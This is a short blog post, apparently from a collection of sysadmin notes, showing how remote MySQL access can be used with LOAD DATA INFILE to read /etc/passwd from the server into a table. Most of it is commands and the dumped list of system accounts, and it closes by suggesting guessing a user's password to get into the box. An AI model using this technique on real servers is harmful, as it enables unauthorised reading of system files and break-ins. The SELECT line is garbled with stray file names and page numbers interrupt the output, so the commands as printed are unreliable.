mysql “load data infile”

rdircio

Say you want to know which users are in a remote server… and you have access to mysql on that server.
# mysql -h remote server;
mysql> show databases;
+————+
| Database |
+————+
| ixx |
| mysql |
| phpmyadmin |
| test |
| video |
| x10 |
| zm |
+————+
mysql > use ixx;
Database changed
mysql> show tables;
+—————-+
| Tables_in_issy |
+—————-+
| ccs |
| fss |
| p |
| prop |
+—————-+
4 rows in set (0.00 sec)
mysql> CREATE TABLE `p` ( `p` TEXT NOT NULL
) TYPE = MYISAM;
mysql> load data infile ‘/etc/passwd’ into table p;
mysql> select kraftek.html POSTS rescue rescued.html rescued.txt x y z from p;
+———————————————————–+
| p |
+———————————————————–+
| root:x:0:0::/root:/bin/bash |
| bin:x:1:1:bin: /bin: |
| daemon:x:2:2:daemon:/sbin: |
| adm:x:3:4:adm: /var/log: |
| lp:x:4:7:lp:/var/spool/lpd: |
| sync:x:5:0:sync:/sbin:/bin/sync |
| shutdown:x:6:0:shutdown:/sbin: /sbin/shutdown |
| halt:x:7:0:halt:/sbin:/sbin/halt |
129/433
| mail:x:8:12:mail:/: |
| news:x:9:13:news:/usr/lib/news: |
| uucp:x:10:14:uucp:/var/spool/uucppublic: |
| operator:x:11: 0:operator:/root:/bin/bash |
| games:x:12:100:games:/usr/games: |
| ftp:x:14:50::/home/ftp: |
| smmsp:x:25:25: smmsp:/var/spool/clientmqueue: |
| mysql:x:27:27: MySQL:/var/lib/mysql:/bin/bash |
| rpc:x:32:32:RPC portmap user:/:/bin/false |
| sshd:x:33:33:sshd:/: |
| gdm:x:42:42:GDM:/var/state/gdm:/bin/bash |
| pop:x:90:90:POP:/: |
| nobody:x:99:99:nobody:/: |
| apache:x:1000: 102::/home/apache:/bin/bash |
| iceuser:x:1001:104::/usr/local/icecast2: |
| vvb:x:1002:100::/home/vvb: |
| ixx:x:1003:100:invitado,1,58252323,:/home/ixx: /bin/bash |
| dvd:x:1004:100:Dvd,,,:/home/dvd:/bin/bash |
+———————————————————–+
26 rows in set (0.00 sec)
You maybe can guess a password for one of these users and get access to the box
130/433

Leave a Reply

Your email address will not be published. Required fields are marked *